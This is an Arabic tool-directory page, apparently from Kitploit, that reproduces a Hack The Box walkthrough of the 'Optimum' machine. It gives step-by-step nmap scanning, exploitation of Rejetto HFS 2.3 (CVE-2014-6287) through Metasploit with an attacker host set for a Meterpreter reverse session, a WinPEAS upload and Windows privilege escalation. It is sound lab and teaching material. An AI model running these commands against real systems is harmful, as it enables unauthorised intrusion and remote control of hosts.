Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Optimum — شرح لجهاز Optimum من منصة Hack The Box. يغطي هذا الشرح استغلال ثغرة Rejetto HttpFileServer 2.3 (CVE-2014-6287) للحصول على وصول أولي، يليه تصعيد الامتيازات على مضيف Windows باستخدام تقنيات التعداد وأدوات ما بعد الاستغلال. | Kitploit
أدوات/GitHubGitHub/r3fr4kt/optimum
تصعيد الامتيازاتالاستطلاعماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالاختبار الاختراقالتعلم والتعليم
GitHubr3fr4kt/optimum
2منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Optimum

شرح لجهاز Optimum من منصة Hack The Box. يغطي هذا الشرح استغلال ثغرة Rejetto HttpFileServer 2.3 (CVE-2014-6287) للحصول على وصول أولي، يليه تصعيد الامتيازات على مضيف Windows باستخدام تقنيات التعداد وأدوات ما بعد الاستغلال.

عرض المستودع

Optimum – تقرير Hack The Box

نظرة عامة

في هذا الجهاز، الهدف هو الحصول على وصول أولي إلى مضيف Windows عبر استغلال خدمة ويب ضعيفة ثم تصعيد الامتيازات للحصول على علم المسؤول.

اشتمل مسار الهجوم على:

  • تعداد الخدمات
  • استغلال Rejetto HTTP File Server 2.3
  • وصول أولي عبر Metasploit
  • تصعيد الامتيازات باستخدام WinPEAS ووحدات ما بعد الاستغلال في Metasploit

الاستطلاع

نبدأ بفحص شامل لمنافذ TCP لتحديد الخدمات المكشوفة.

root@kitploit:~
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>

يكشف الفحص أن المنفذ 80 مفتوح.

بعد ذلك، نجري فحصًا للإصدار والخدمة.

root@kitploit:~
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>

تُعرّف النتيجة الخدمة التالية:

root@kitploit:~
HttpFileServer 2.3

هذه الخدمة تقابل Rejetto HTTP File Server، وهو خادم ويب خفيف لمشاركة الملفات.


تحديد الثغرة

بعد البحث في الإصدار المكتشف، نجد ثغرة معروفة:

root@kitploit:~
CVE-2014-6287

تتيح هذه الثغرة تنفيذ التعليمات البرمجية عن بُعد بسبب عدم كفاية تنظيف المدخلات.


الاستغلال

لاستغلال الثغرة، نستخدم Metasploit.

ابدأ Metasploit:

root@kitploit:~
msfconsole -q

ابحث عن الوحدة المناسبة:

root@kitploit:~
search rejetto

حمّل وحدة الاستغلال:

root@kitploit:~
use exploit/windows/http/rejetto_hfs_exec

اضبط الخيارات المطلوبة:

root@kitploit:~
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run

بمجرد التنفيذ، يوفر الاستغلال جلسة Meterpreter على الجهاز الهدف.


الوصول الأولي

مع جلسة Meterpreter التي حصلنا عليها، نتنقل في نظام الملفات لاسترجاع علم المستخدم.

root@kitploit:~
cd
cat user.txt
whoami

يُظهر مخرج الأمر أننا سجّلنا الدخول باسم:

root@kitploit:~
kostas

ولأن هذا المستخدم لا يملك صلاحيات إدارية، نتابع مع تصعيد الامتيازات.


تعداد تصعيد الامتيازات

لتحديد ناقلات تصعيد الامتيازات المحتملة، نرفع WinPEAS، وهي أداة معروفة لتعداد تصعيد الامتيازات في Windows.

root@kitploit:~
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe

ثم نقوم بتشغيلها:

root@kitploit:~
shell
.\wp.exe

يكشف المخرج معلومات مفيدة، بما في ذلك بيانات اعتماد مرتبطة بالمستخدم kostas.


تصعيد الامتيازات

بعد مراجعة ناقلات التصعيد الممكنة، نستخدم وحدة Metasploit:

root@kitploit:~
local_exploit_suggester

حمّل الوحدة:

root@kitploit:~
use post/multi/recon/local_exploit_suggester

اضبط الجلسة:

root@kitploit:~
set SESSION <SESSION_NUMBER>
run

تقترح هذه الوحدة استغلالات محلية محتملة يمكن استخدامها لتصعيد الامتيازات.

بعد نجاح تصعيد الامتيازات، نحصل على شل بصلاحيات إدارية.

التحقق:

root@kitploit:~
shell
whoami

وصول المسؤول

بمجرد الحصول على صلاحيات إدارية، ننتقل إلى مجلد Administrator لاسترجاع علم المسؤول.

root@kitploit:~
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt

الدروس المستفادة

يُظهر هذا الجهاز العديد من مفاهيم اختبار الاختراق المهمة:

  • تعداد الخدمات بشكل صحيح أمر بالغ الأهمية لتحديد البرمجيات الضعيفة.
  • الثغرات المعروفة للعامة مثل CVE-2014-6287 يمكن أن تؤدي إلى تنفيذ فوري للتعليمات البرمجية عن بُعد.
  • أدوات مثل WinPEAS تساعد في تحديد فرص تصعيد الامتيازات في بيئات Windows.
  • يمكن لوحدات ما بعد الاستغلال في Metasploit تسريع عملية تصعيد الامتيازات.
تنزيل الأداة